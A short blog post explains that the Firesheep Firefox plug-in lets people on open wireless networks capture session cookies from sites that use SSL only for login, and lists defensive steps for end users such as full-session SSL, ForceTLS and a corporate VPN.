Firesheep is a winpcap based Firefox plug-in that lets anyone on a open wireless network sniff out other users' cookies that belong to sites that use SSL only for their login and not for the rest of the session.

Nothing new - but this is a problem that the web community has ignored for a long time.

Possible counter-measures for a typical end user:
  • Don't use any open wireless devices :(
  • If you have to, only visit sites that support SSL for the entire session and not just the initial authentication (e.g.
  • Use a plug-in like ForceTLS (read the documentation to understand how it works)
  • If you have a work laptop, VPN into your corporate network first (and ensure that all browser requests gets routed through your corporate proxy)

No comments:

Post a Comment